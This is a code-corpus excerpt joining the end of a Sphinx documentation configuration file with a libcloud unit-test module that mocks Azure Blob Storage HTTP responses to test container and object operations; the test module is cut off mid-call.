# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# '**' applies these sidebars to every page.
html_sidebars = {'**': ['localtoc.html', 'searchbox.html']}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
html_domain_indices = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'shablonadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    ('index', 'shablona.tex', 'shablona Documentation',
     'Ariel Rokem', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'shablona', 'shablona Documentation',
     ['Ariel Rokem'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'shablona', 'shablona Documentation',
     'Ariel Rokem', 'shablona', 'One line description of project.',
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
texinfo_domain_indices = False
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| neurohackweek/avalanche | doc/conf.py | Python | apache-2.0 | 9,704 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import os
import sys
import tempfile
from io import BytesIO
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import urlparse
from libcloud.utils.py3 import parse_qs
from libcloud.utils.py3 import b
from libcloud.utils.py3 import basestring
from libcloud.common.types import InvalidCredsError
from libcloud.common.types import LibcloudError
from libcloud.storage.base import Container, Object
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import ContainerAlreadyExistsError
from libcloud.storage.types import InvalidContainerNameError
from libcloud.storage.types import ObjectDoesNotExistError
from libcloud.storage.types import ObjectHashMismatchError
from libcloud.storage.drivers.azure_blobs import AzureBlobsStorageDriver
from libcloud.storage.drivers.azure_blobs import AZURE_BLOCK_MAX_SIZE
from libcloud.storage.drivers.azure_blobs import AZURE_PAGE_CHUNK_SIZE
from libcloud.test import unittest
from libcloud.test import MockHttp, generate_random_data # pylint: disable-msg=E0611
from libcloud.test.file_fixtures import StorageFileFixtures # pylint: disable-msg=E0611
from libcloud.test.secrets import STORAGE_AZURE_BLOBS_PARAMS
class AzureBlobsMockHttp(MockHttp, unittest.TestCase):
    """Mock HTTP endpoint returning canned Azure Blob Storage responses."""

    # Fixture files with pre-recorded Azure XML response bodies.
    fixtures = StorageFileFixtures('azure_blobs')
    # Headers merged into every mocked response.
    base_headers = {}
def _UNAUTHORIZED(self, method, url, body, headers):
return (httplib.UNAUTHORIZED,
'',
self.base_headers,
httplib.responses[httplib.UNAUTHORIZED])
    def _list_containers_EMPTY(self, method, url, body, headers):
        # Account with no containers: empty listing fixture.
        body = self.fixtures.load('list_containers_empty.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])

    def _list_containers(self, method, url, body, headers):
        # Paged container listing: the presence of a 'marker' query
        # parameter selects the second page of the fixture data.
        query_string = urlparse.urlsplit(url).query
        query = parse_qs(query_string)
        if 'marker' not in query:
            body = self.fixtures.load('list_containers_1.xml')
        else:
            body = self.fixtures.load('list_containers_2.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])
    def _test_container_EMPTY(self, method, url, body, headers):
        # DELETE is acknowledged with 202; any other method returns an
        # empty object listing.
        if method == 'DELETE':
            body = u''
            return (httplib.ACCEPTED,
                    body,
                    self.base_headers,
                    httplib.responses[httplib.ACCEPTED])
        else:
            body = self.fixtures.load('list_objects_empty.xml')
            return (httplib.OK,
                    body,
                    self.base_headers,
                    httplib.responses[httplib.OK])

    def _new__container_INVALID_NAME(self, method, url, body, headers):
        # Azure rejects invalid container names with 400.
        return (httplib.BAD_REQUEST,
                body,
                self.base_headers,
                httplib.responses[httplib.BAD_REQUEST])
    def _test_container(self, method, url, body, headers):
        # Paged object listing: 'marker' query parameter selects page two.
        query_string = urlparse.urlsplit(url).query
        query = parse_qs(query_string)
        if 'marker' not in query:
            body = self.fixtures.load('list_objects_1.xml')
        else:
            body = self.fixtures.load('list_objects_2.xml')
        return (httplib.OK,
                body,
                self.base_headers,
                httplib.responses[httplib.OK])

    def _test_container100(self, method, url, body, headers):
        # Container lookup that does not exist: HEAD gets 404, any other
        # method is considered a client error in this scenario.
        body = ''
        if method != 'HEAD':
            return (httplib.BAD_REQUEST,
                    body,
                    self.base_headers,
                    httplib.responses[httplib.BAD_REQUEST])
        return (httplib.NOT_FOUND,
                body,
                self.base_headers,
                httplib.responses[httplib.NOT_FOUND])
    def _test_container200(self, method, url, body, headers):
        # HEAD on an existing container: returns container metadata in
        # the response headers; non-HEAD methods get 400.
        body = ''
        if method != 'HEAD':
            return (httplib.BAD_REQUEST,
                    body,
                    self.base_headers,
                    httplib.responses[httplib.BAD_REQUEST])
        headers = {}
        headers['etag'] = '0x8CFB877BB56A6FB'
        headers['last-modified'] = 'Fri, 04 Jan 2013 09:48:06 GMT'
        headers['x-ms-lease-status'] = 'unlocked'
        headers['x-ms-lease-state'] = 'available'
        headers['x-ms-meta-meta1'] = 'value1'
        return (httplib.OK,
                body,
                headers,
                httplib.responses[httplib.OK])

    def _test_container200_test(self, method, url, body, headers):
        # HEAD on an existing blob: returns blob properties and custom
        # metadata in the response headers; non-HEAD methods get 400.
        body = ''
        if method != 'HEAD':
            return (httplib.BAD_REQUEST,
                    body,
                    self.base_headers,
                    httplib.responses[httplib.BAD_REQUEST])
        headers = {}
        headers['etag'] = '0x8CFB877BB56A6FB'
        headers['last-modified'] = 'Fri, 04 Jan 2013 09:48:06 GMT'
        headers['content-length'] = '12345'
        headers['content-type'] = 'application/zip'
        headers['x-ms-blob-type'] = 'Block'
        headers['x-ms-lease-status'] = 'unlocked'
        headers['x-ms-lease-state'] = 'available'
        headers['x-ms-meta-rabbits'] = 'monkeys'
        return (httplib.OK,
                body,
                headers,
                httplib.responses[httplib.OK])
    def _test2_test_list_containers(self, method, url, body, headers):
        # test_get_object
        # Returns a container listing body plus object-style headers.
        body = self.fixtures.load('list_containers.xml')
        headers = {'content-type': 'application/zip',
                   'etag': '"e31208wqsdoj329jd"',
                   'x-amz-meta-rabbits': 'monkeys',
                   'content-length': '12345',
                   'last-modified': 'Thu, 13 Sep 2012 07:13:22 GMT'
                   }
        return (httplib.OK,
                body,
                headers,
                httplib.responses[httplib.OK])

    def _new_container_ALREADY_EXISTS(self, method, url, body, headers):
        # test_create_container
        # Creating a container that already exists yields 409 Conflict.
        return (httplib.CONFLICT,
                body,
                headers,
                httplib.responses[httplib.CONFLICT])
def _new_container(self, method, url, body, headers):
# test_create_container, test_delete_container
headers = {}
if method == 'PUT':
status = httplib.CREATED
headers['etag'] = '0x8CFB877BB56A6FB'
headers['last-modified'] = 'Fri, 04 Jan 2013 09:48:06 GMT'
headers['x-ms-lease-status'] = 'unlocked'
headers['x-ms-lease-state'] = 'available'
headers['x-ms-meta-meta1'] = 'value1'
elif method == 'DELETE':
status = httplib.NO_CONTENT
return (status,
body,
headers,
httplib.responses[status])
    def _new_container_DOESNT_EXIST(self, method, url, body, headers):
        # test_delete_container
        # Deleting a non-existent container yields 404.
        return (httplib.NOT_FOUND,
                body,
                headers,
                httplib.responses[httplib.NOT_FOUND])

    def _foo_bar_container_NOT_FOUND(self, method, url, body, headers):
        # test_delete_container_not_found
        return (httplib.NOT_FOUND,
                body,
                headers,
                httplib.responses[httplib.NOT_FOUND])

    def _foo_bar_container_foo_bar_object_NOT_FOUND(self, method, url, body,
                                                    headers):
        # test_delete_object_not_found
        return (httplib.NOT_FOUND,
                body,
                headers,
                httplib.responses[httplib.NOT_FOUND])

    def _foo_bar_container_foo_bar_object_DELETE(self, method, url, body, headers):
        # test_delete_object
        # Azure acknowledges blob deletion with 202 Accepted.
        return (httplib.ACCEPTED,
                body,
                headers,
                httplib.responses[httplib.ACCEPTED])
    def _foo_bar_container_foo_test_upload(self, method, url, body, headers):
        # test_upload_object_success
        # Simple blob upload: 201 with etag and the server-computed MD5.
        self._assert_content_length_header_is_string(headers=headers)
        body = ''
        headers = {}
        headers['etag'] = '0x8CFB877BB56A6FB'
        headers['content-md5'] = 'd4fe4c9829f7ca1cc89db7ad670d2bbd'
        return (httplib.CREATED,
                body,
                headers,
                httplib.responses[httplib.CREATED])

    def _foo_bar_container_foo_test_upload_block(self, method, url,
                                                 body, headers):
        # test_upload_object_success
        # Individual block upload: 201 with etag only (no MD5 header).
        self._assert_content_length_header_is_string(headers=headers)
        body = ''
        headers = {}
        headers['etag'] = '0x8CFB877BB56A6FB'
        return (httplib.CREATED,
                body,
                headers,
                httplib.responses[httplib.CREATED])

    def _foo_bar_container_foo_test_upload_page(self, method, url,
                                                body, headers):
        # test_upload_object_success
        # Page blob upload: 201 with etag.
        body = ''
        headers = {}
        headers['etag'] = '0x8CFB877BB56A6FB'
        return (httplib.CREATED,
                body,
                headers,
                httplib.responses[httplib.CREATED])

    def _foo_bar_container_foo_test_upload_blocklist(self, method, url,
                                                     body, headers):
        # test_upload_object_success
        # Commit of the uploaded block list: 201 with etag and MD5.
        self._assert_content_length_header_is_string(headers=headers)
        body = ''
        headers = {}
        headers['etag'] = '0x8CFB877BB56A6FB'
        headers['content-md5'] = 'd4fe4c9829f7ca1cc89db7ad670d2bbd'
        return (httplib.CREATED,
                body,
                headers,
                httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_test_upload_lease(self, method, url,
body, headers):
# test_upload_object_success
self._assert_content_length_header_is_string(headers=headers)
action = headers['x-ms-lease-action']
rheaders = {'x-ms-lease-id': 'someleaseid'}
body = ''
if action == 'acquire':
return (httplib.CREATED,
body,
rheaders,
httplib.responses[httplib.CREATED])
else:
if headers.get('x-ms-lease-id', None) != 'someleaseid':
return (httplib.BAD_REQUEST,
body,
rheaders,
httplib.responses[httplib.BAD_REQUEST])
return (httplib.OK,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_test_upload_INVALID_HASH(self, method, url,
body, headers):
# test_upload_object_invalid_hash1
self._assert_content_length_header_is_string(headers=headers)
body = ''
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
headers['content-md5'] = 'd4fe4c9829f7ca1cc89db7ad670d2bbd'
return (httplib.CREATED,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_bar_object(self, method, url, body, headers):
    """Mock GET for test_download_object_success: serve a 1000-byte blob."""
    self._assert_content_length_header_is_string(headers=headers)
    payload = generate_random_data(1000)
    return (httplib.OK, payload, headers, httplib.responses[httplib.OK])
def _foo_bar_container_foo_bar_object_INVALID_SIZE(self, method, url,
body, headers):
# test_upload_object_invalid_file_size
self._assert_content_length_header_is_string(headers=headers)
body = ''
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _assert_content_length_header_is_string(self, headers):
if 'Content-Length' in headers:
self.assertTrue(isinstance(headers['Content-Length'], basestring))
class AzureBlobsTests(unittest.TestCase):
    """Tests for AzureBlobsStorageDriver backed by AzureBlobsMockHttp.

    Each test selects a canned HTTP response by assigning a suffix string
    to ``mock_response_klass.type`` (and sometimes ``use_param``) before
    exercising the driver.
    """

    driver_type = AzureBlobsStorageDriver
    driver_args = STORAGE_AZURE_BLOBS_PARAMS
    mock_response_klass = AzureBlobsMockHttp

    @classmethod
    def create_driver(self):
        # NOTE(review): declared @classmethod but names its first argument
        # ``self``; it receives the class object at call time.
        return self.driver_type(*self.driver_args)

    def setUp(self):
        # Route all driver HTTP traffic through the mock connection class and
        # reset the canned-response selector before each test.
        self.driver_type.connectionCls.conn_class = self.mock_response_klass
        self.mock_response_klass.type = None
        self.driver = self.create_driver()

    def tearDown(self):
        self._remove_test_file()

    def _remove_test_file(self):
        # Best-effort cleanup of the temp file the download tests create.
        file_path = os.path.abspath(__file__) + '.temp'

        try:
            os.unlink(file_path)
        except OSError:
            pass

    def test_invalid_credentials(self):
        self.mock_response_klass.type = 'UNAUTHORIZED'
        try:
            self.driver.list_containers()
        except InvalidCredsError:
            e = sys.exc_info()[1]
            self.assertEqual(True, isinstance(e, InvalidCredsError))
        else:
            self.fail('Exception was not thrown')

    def test_list_containers_empty(self):
        self.mock_response_klass.type = 'list_containers_EMPTY'
        containers = self.driver.list_containers()
        self.assertEqual(len(containers), 0)

    def test_list_containers_success(self):
        self.mock_response_klass.type = 'list_containers'
        # Force pagination: two results per request exercises the marker
        # (continuation) handling in the driver.
        AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2

        containers = self.driver.list_containers()
        self.assertEqual(len(containers), 4)

        self.assertTrue('last_modified' in containers[1].extra)
        self.assertTrue('url' in containers[1].extra)
        self.assertTrue('etag' in containers[1].extra)
        self.assertTrue('lease' in containers[1].extra)
        self.assertTrue('meta_data' in containers[1].extra)

    def test_list_container_objects_empty(self):
        self.mock_response_klass.type = 'EMPTY'
        container = Container(name='test_container', extra={},
                              driver=self.driver)
        objects = self.driver.list_container_objects(container=container)
        self.assertEqual(len(objects), 0)

    def test_list_container_objects_success(self):
        self.mock_response_klass.type = None
        AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2

        container = Container(name='test_container', extra={},
                              driver=self.driver)
        objects = self.driver.list_container_objects(container=container)
        self.assertEqual(len(objects), 4)

        obj = objects[1]
        self.assertEqual(obj.name, 'object2.txt')
        self.assertEqual(obj.hash, '0x8CFB90F1BA8CD8F')
        self.assertEqual(obj.size, 1048576)
        self.assertEqual(obj.container.name, 'test_container')
        self.assertTrue('meta1' in obj.meta_data)
        self.assertTrue('meta2' in obj.meta_data)
        self.assertTrue('last_modified' in obj.extra)
        self.assertTrue('content_type' in obj.extra)
        self.assertTrue('content_encoding' in obj.extra)
        self.assertTrue('content_language' in obj.extra)

    def test_get_container_doesnt_exist(self):
        self.mock_response_klass.type = None
        try:
            self.driver.get_container(container_name='test_container100')
        except ContainerDoesNotExistError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_get_container_success(self):
        self.mock_response_klass.type = None
        container = self.driver.get_container(
            container_name='test_container200')

        # NOTE(review): assertTrue(x, y) treats the second argument as the
        # failure *message*, not an expected value — these five checks only
        # verify truthiness and were probably meant to be assertEqual.
        self.assertTrue(container.name, 'test_container200')
        self.assertTrue(container.extra['etag'], '0x8CFB877BB56A6FB')
        self.assertTrue(container.extra['last_modified'],
                        'Fri, 04 Jan 2013 09:48:06 GMT')
        self.assertTrue(container.extra['lease']['status'], 'unlocked')
        self.assertTrue(container.extra['lease']['state'], 'available')
        self.assertTrue(container.extra['meta_data']['meta1'], 'value1')

    def test_get_object_container_doesnt_exist(self):
        # This method makes two requests which makes mocking the response a bit
        # trickier
        self.mock_response_klass.type = None
        try:
            self.driver.get_object(container_name='test_container100',
                                   object_name='test')
        except ContainerDoesNotExistError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_get_object_success(self):
        # This method makes two requests which makes mocking the response a bit
        # trickier
        self.mock_response_klass.type = None
        obj = self.driver.get_object(container_name='test_container200',
                                     object_name='test')

        self.assertEqual(obj.name, 'test')
        self.assertEqual(obj.container.name, 'test_container200')
        self.assertEqual(obj.size, 12345)
        self.assertEqual(obj.hash, '0x8CFB877BB56A6FB')
        self.assertEqual(obj.extra['last_modified'],
                         'Fri, 04 Jan 2013 09:48:06 GMT')
        self.assertEqual(obj.extra['content_type'], 'application/zip')
        self.assertEqual(obj.meta_data['rabbits'], 'monkeys')

    def test_create_container_invalid_name(self):
        # invalid container name
        self.mock_response_klass.type = 'INVALID_NAME'
        try:
            self.driver.create_container(container_name='new--container')
        except InvalidContainerNameError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_create_container_already_exists(self):
        # container with this name already exists
        self.mock_response_klass.type = 'ALREADY_EXISTS'
        try:
            self.driver.create_container(container_name='new-container')
        except ContainerAlreadyExistsError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_create_container_success(self):
        # success
        self.mock_response_klass.type = None
        name = 'new-container'
        container = self.driver.create_container(container_name=name)
        self.assertEqual(container.name, name)

    def test_delete_container_doesnt_exist(self):
        container = Container(name='new_container', extra=None,
                              driver=self.driver)
        self.mock_response_klass.type = 'DOESNT_EXIST'
        try:
            self.driver.delete_container(container=container)
        except ContainerDoesNotExistError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_delete_container_not_empty(self):
        self.mock_response_klass.type = None
        AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2

        container = Container(name='test_container', extra={},
                              driver=self.driver)
        try:
            self.driver.delete_container(container=container)
        except ContainerIsNotEmptyError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_delete_container_success(self):
        self.mock_response_klass.type = 'EMPTY'
        AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2
        container = Container(name='test_container', extra={},
                              driver=self.driver)
        self.assertTrue(self.driver.delete_container(container=container))

    def test_delete_container_not_found(self):
        self.mock_response_klass.type = 'NOT_FOUND'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        try:
            self.driver.delete_container(container=container)
        except ContainerDoesNotExistError:
            pass
        else:
            self.fail('Container does not exist but an exception was not' +
                      'thrown')

    def test_download_object_success(self):
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        # NOTE(review): ``driver=self.driver_type`` passes the driver *class*
        # rather than the instance used elsewhere — confirm intentional.
        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)
        destination_path = os.path.abspath(__file__) + '.temp'
        result = self.driver.download_object(obj=obj,
                                             destination_path=destination_path,
                                             overwrite_existing=False,
                                             delete_on_failure=True)
        self.assertTrue(result)

    def test_download_object_invalid_file_size(self):
        self.mock_response_klass.type = 'INVALID_SIZE'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)
        destination_path = os.path.abspath(__file__) + '.temp'
        result = self.driver.download_object(obj=obj,
                                             destination_path=destination_path,
                                             overwrite_existing=False,
                                             delete_on_failure=True)
        self.assertFalse(result)

    def test_download_object_invalid_file_already_exists(self):
        self.mock_response_klass.type = 'INVALID_SIZE'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)
        # Points at this source file itself, which always exists, so the
        # overwrite_existing=False path must raise.
        destination_path = os.path.abspath(__file__)
        try:
            self.driver.download_object(obj=obj,
                                        destination_path=destination_path,
                                        overwrite_existing=False,
                                        delete_on_failure=True)
        except LibcloudError:
            pass
        else:
            self.fail('Exception was not thrown')

    def test_download_object_as_stream_success(self):
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)

        obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
                     container=container, meta_data=None,
                     driver=self.driver_type)

        stream = self.driver.download_object_as_stream(obj=obj,
                                                       chunk_size=None)
        self.assertTrue(hasattr(stream, '__iter__'))

    def test_upload_object_invalid_ex_blob_type(self):
        # An unsupported ex_blob_type value is rejected by the driver with a
        # LibcloudError before any request is made.
        file_path = os.path.abspath(__file__)
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        try:
            self.driver.upload_object(file_path=file_path, container=container,
                                      object_name=object_name,
                                      verify_hash=True,
                                      ex_blob_type='invalid-blob')
        except LibcloudError:
            e = sys.exc_info()[1]
            self.assertTrue(str(e).lower().find('invalid blob type') != -1)
        else:
            self.fail('Exception was not thrown')

    def test_upload_object_invalid_md5(self):
        # Invalid md5 is returned by azure
        self.mock_response_klass.type = 'INVALID_HASH'

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        file_path = os.path.abspath(__file__)
        try:
            self.driver.upload_object(file_path=file_path, container=container,
                                      object_name=object_name,
                                      verify_hash=True)
        except ObjectHashMismatchError:
            pass
        else:
            self.fail(
                'Invalid hash was returned but an exception was not thrown')

    def test_upload_small_block_object_success(self):
        file_path = os.path.abspath(__file__)
        file_size = os.stat(file_path).st_size

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        obj = self.driver.upload_object(file_path=file_path,
                                        container=container,
                                        object_name=object_name,
                                        extra=extra,
                                        verify_hash=False,
                                        ex_blob_type='BlockBlob')

        self.assertEqual(obj.name, 'foo_test_upload')
        self.assertEqual(obj.size, file_size)
        self.assertTrue('some-value' in obj.meta_data)

    def test_upload_big_block_object_success(self):
        # Just over the single-request limit forces the chunked upload path.
        file_path = tempfile.mktemp(suffix='.jpg')
        file_size = AZURE_BLOCK_MAX_SIZE + 1

        with open(file_path, 'w') as file_hdl:
            file_hdl.write('0' * file_size)

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        obj = self.driver.upload_object(file_path=file_path,
                                        container=container,
                                        object_name=object_name,
                                        extra=extra,
                                        verify_hash=False,
                                        ex_blob_type='BlockBlob')

        self.assertEqual(obj.name, 'foo_test_upload')
        self.assertEqual(obj.size, file_size)
        self.assertTrue('some-value' in obj.meta_data)

        os.remove(file_path)

    def test_upload_page_object_success(self):
        self.mock_response_klass.use_param = None
        file_path = tempfile.mktemp(suffix='.jpg')
        # Page blobs must be a multiple of the page chunk size.
        file_size = AZURE_PAGE_CHUNK_SIZE * 4

        with open(file_path, 'w') as file_hdl:
            file_hdl.write('0' * file_size)

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        obj = self.driver.upload_object(file_path=file_path,
                                        container=container,
                                        object_name=object_name,
                                        extra=extra,
                                        verify_hash=False,
                                        ex_blob_type='PageBlob')

        self.assertEqual(obj.name, 'foo_test_upload')
        self.assertEqual(obj.size, file_size)
        self.assertTrue('some-value' in obj.meta_data)

        os.remove(file_path)

    def test_upload_page_object_failure(self):
        # A size that is not page-aligned must be rejected by the driver.
        file_path = tempfile.mktemp(suffix='.jpg')
        file_size = AZURE_PAGE_CHUNK_SIZE * 2 + 1

        with open(file_path, 'w') as file_hdl:
            file_hdl.write('0' * file_size)

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        try:
            self.driver.upload_object(file_path=file_path,
                                      container=container,
                                      object_name=object_name,
                                      extra=extra,
                                      verify_hash=False,
                                      ex_blob_type='PageBlob')
        except LibcloudError:
            e = sys.exc_info()[1]
            self.assertTrue(str(e).lower().find('not aligned') != -1)
        # NOTE(review): no ``else: self.fail(...)`` — if upload_object does
        # not raise, this test silently passes.

        os.remove(file_path)

    def test_upload_small_block_object_success_with_lease(self):
        self.mock_response_klass.use_param = 'comp'
        file_path = os.path.abspath(__file__)
        file_size = os.stat(file_path).st_size

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        obj = self.driver.upload_object(file_path=file_path,
                                        container=container,
                                        object_name=object_name,
                                        extra=extra,
                                        verify_hash=False,
                                        ex_blob_type='BlockBlob',
                                        ex_use_lease=True)

        self.assertEqual(obj.name, 'foo_test_upload')
        self.assertEqual(obj.size, file_size)
        self.assertTrue('some-value' in obj.meta_data)
        self.mock_response_klass.use_param = None

    def test_upload_big_block_object_success_with_lease(self):
        self.mock_response_klass.use_param = 'comp'
        file_path = tempfile.mktemp(suffix='.jpg')
        file_size = AZURE_BLOCK_MAX_SIZE * 2

        with open(file_path, 'w') as file_hdl:
            file_hdl.write('0' * file_size)

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        # NOTE(review): despite the test name, ex_use_lease is False here —
        # confirm whether True was intended.
        obj = self.driver.upload_object(file_path=file_path,
                                        container=container,
                                        object_name=object_name,
                                        extra=extra,
                                        verify_hash=False,
                                        ex_blob_type='BlockBlob',
                                        ex_use_lease=False)

        self.assertEqual(obj.name, 'foo_test_upload')
        self.assertEqual(obj.size, file_size)
        self.assertTrue('some-value' in obj.meta_data)

        os.remove(file_path)
        self.mock_response_klass.use_param = None

    def test_upload_page_object_success_with_lease(self):
        self.mock_response_klass.use_param = 'comp'
        file_path = tempfile.mktemp(suffix='.jpg')
        file_size = AZURE_PAGE_CHUNK_SIZE * 4

        with open(file_path, 'w') as file_hdl:
            file_hdl.write('0' * file_size)

        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        object_name = 'foo_test_upload'
        extra = {'meta_data': {'some-value': 'foobar'}}
        obj = self.driver.upload_object(file_path=file_path,
                                        container=container,
                                        object_name=object_name,
                                        extra=extra,
                                        verify_hash=False,
                                        ex_blob_type='PageBlob',
                                        ex_use_lease=True)

        self.assertEqual(obj.name, 'foo_test_upload')
        self.assertEqual(obj.size, file_size)
        self.assertTrue('some-value' in obj.meta_data)

        os.remove(file_path)
        self.mock_response_klass.use_param = None

    def test_upload_blob_object_via_stream(self):
        self.mock_response_klass.use_param = 'comp'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)

        object_name = 'foo_test_upload'
        iterator = BytesIO(b('345'))
        extra = {'content_type': 'text/plain'}
        obj = self.driver.upload_object_via_stream(container=container,
                                                   object_name=object_name,
                                                   iterator=iterator,
                                                   extra=extra,
                                                   ex_blob_type='BlockBlob')

        self.assertEqual(obj.name, object_name)
        self.assertEqual(obj.size, 3)
        self.mock_response_klass.use_param = None

    def test_upload_blob_object_via_stream_with_lease(self):
        self.mock_response_klass.use_param = 'comp'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)

        object_name = 'foo_test_upload'
        iterator = BytesIO(b('345'))
        extra = {'content_type': 'text/plain'}
        obj = self.driver.upload_object_via_stream(container=container,
                                                   object_name=object_name,
